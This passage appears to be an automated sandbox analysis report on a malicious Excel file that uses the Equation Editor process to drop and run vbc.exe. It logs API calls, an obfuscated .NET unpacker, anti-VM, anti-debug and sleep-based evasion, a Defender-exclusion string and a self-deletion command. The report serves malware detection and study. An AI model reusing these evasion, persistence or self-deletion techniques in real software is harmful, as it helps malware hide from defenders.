Source: C:\Users\Public\vbc.exe Code function: 5_2_008810D0 NtOpenProcessToken, 5_2_008810D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00880060 NtQuerySection, 5_2_00880060
Source: C:\Users\Public\vbc.exe Code function: 5_2_008801D4 NtSetValueKey, 5_2_008801D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0088010C NtOpenDirectoryObject, 5_2_0088010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00881148 NtOpenThread, 5_2_00881148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087F8CC NtWaitForSingleObject, 5_2_0087F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00881930 NtSetContextThread, 5_2_00881930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087F938 NtWriteFile, 5_2_0087F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FAB8 NtQueryValueKey, 5_2_0087FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FA20 NtQueryInformationFile, 5_2_0087FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FA50 NtEnumerateValueKey, 5_2_0087FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FBE8 NtQueryVirtualMemory, 5_2_0087FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FB50 NtCreateKey, 5_2_0087FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FC30 NtOpenProcess, 5_2_0087FC30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A751E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 7_2_4A751E5F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A74F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile, 7_2_4A74F6CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken, 7_2_4A73C2A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A7418A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 7_2_4A7418A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose, 7_2_4A73C48A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73C52D NtQueryInformationToken, 7_2_4A73C52D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023500C4 NtCreateFile,LdrInitializeThunk, 7_2_023500C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023507AC NtCreateMutant,LdrInitializeThunk, 7_2_023507AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0234FAE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0234FB68
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FB50 NtCreateKey,LdrInitializeThunk, 7_2_0234FB50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0234FBB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234F900 NtReadFile,LdrInitializeThunk, 7_2_0234F900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234F9F0 NtClose,LdrInitializeThunk, 7_2_0234F9F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0234FED0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0234FFB4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0234FC60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0234FD8C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0234FDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02350078 NtResumeThread, 7_2_02350078
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02350060 NtQuerySection, 7_2_02350060
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02350048 NtProtectVirtualMemory, 7_2_02350048
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023510D0 NtOpenProcessToken, 7_2_023510D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0235010C NtOpenDirectoryObject, 7_2_0235010C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02351148 NtOpenThread, 7_2_02351148
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023501D4 NtSetValueKey, 7_2_023501D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FA20 NtQueryInformationFile, 7_2_0234FA20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FA50 NtEnumerateValueKey, 7_2_0234FA50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FAB8 NtQueryValueKey, 7_2_0234FAB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FAD0 NtAllocateVirtualMemory, 7_2_0234FAD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FBE8 NtQueryVirtualMemory, 7_2_0234FBE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234F8CC NtWaitForSingleObject, 7_2_0234F8CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02351930 NtSetContextThread, 7_2_02351930
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234F938 NtWriteFile, 7_2_0234F938
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FE24 NtWriteVirtualMemory, 7_2_0234FE24
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FEA0 NtReadVirtualMemory, 7_2_0234FEA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FF34 NtQueueApcThread, 7_2_0234FF34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FFFC NtCreateProcessEx, 7_2_0234FFFC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FC30 NtOpenProcess, 7_2_0234FC30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02350C40 NtGetContextThread, 7_2_02350C40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FC48 NtSetInformationFile, 7_2_0234FC48
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FC90 NtUnmapViewOfSection, 7_2_0234FC90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0234FD5C NtEnumerateKey, 7_2_0234FD5C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02351D80 NtSuspendThread, 7_2_02351D80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000985B0 NtCreateFile, 7_2_000985B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00098660 NtReadFile, 7_2_00098660
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000986E0 NtClose, 7_2_000986E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000985AA NtCreateFile, 7_2_000985AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_000986DA NtClose, 7_2_000986DA
Contains functionality to communicate with device drivers
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose, 7_2_4A73A902
PE file contains strange resources
Source: deo[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: deo[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: OCT 13 2021 - PRINT COPY.xlsx ReversingLabs: Detection: 23%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$OCT 13 2021 - PRINT COPY.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF833.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/13@6/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A743185 GetDiskFreeSpaceExW, 7_2_4A743185
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.539428502.00000000004AC000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, cmd.exe
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb,$uJ6$uJ@$uJ source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe, 00000007.00000000.540165675.000000004A730000.00000040.00020000.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: deo[1].exe.2.dr, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.d60000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.d60000.2.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.d60000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.vbc.exe.d60000.4.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00258B50 push esp; iretd 4_2_00258B56
Source: C:\Users\Public\vbc.exe Code function: 4_2_00254497 push cs; iretd 4_2_00254499
Source: C:\Users\Public\vbc.exe Code function: 4_2_00252C96 push esi; iretd 4_2_00252C97
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B85C push eax; ret 5_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 5_2_00407027 push ebx; ret 5_2_00407096
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415115 push es; iretd 5_2_00415128
Source: C:\Users\Public\vbc.exe Code function: 5_2_00414F3A push ds; iretd 5_2_00414F3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7F2 push eax; ret 5_2_0041B7F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7FB push eax; ret 5_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7A5 push eax; ret 5_2_0041B7F8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A7313B6 push ecx; ret 7_2_4A7313C9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0235DFA1 push ecx; ret 7_2_0235DFB4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00087027 push ebx; ret 7_2_00087096
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0009B85C push eax; ret 7_2_0009B862
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00095115 push es; iretd 7_2_00095128
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00094F3A push ds; iretd 7_2_00094F3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0009B7A5 push eax; ret 7_2_0009B7F8
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A74D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory, 7_2_4A74D539
Source: initial sample Static PE information: section name: .text entropy: 7.77320879492
Source: initial sample Static PE information: section name: .text entropy: 7.77320879492

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 4.2.vbc.exe.21ee5b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2628, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2556 Thread sleep time: -38861s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1636 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_4A732E73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A736E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_4A736E47
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A750202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError, 7_2_4A750202
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A74BF0C FindFirstFileW,FindNextFileW,FindClose, 7_2_4A74BF0C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose, 7_2_4A73BBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A750492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose, 7_2_4A750492
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 38861 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.506683745.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.506449406.000000000449C000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.486562840.000000000456F000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000000.506449406.000000000449C000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000000
Source: explorer.exe, 00000006.00000000.523158349.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.486667717.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.506683745.000000000457A000.00000004.00000001.sdmp Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A74D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory, 7_2_4A74D539
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_4A732E73
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008926F8 mov eax, dword ptr fs:[00000030h] 5_2_008926F8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023626F8 mov eax, dword ptr fs:[00000030h] 7_2_023626F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B30 LdrLoadDll, 5_2_00409B30
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior
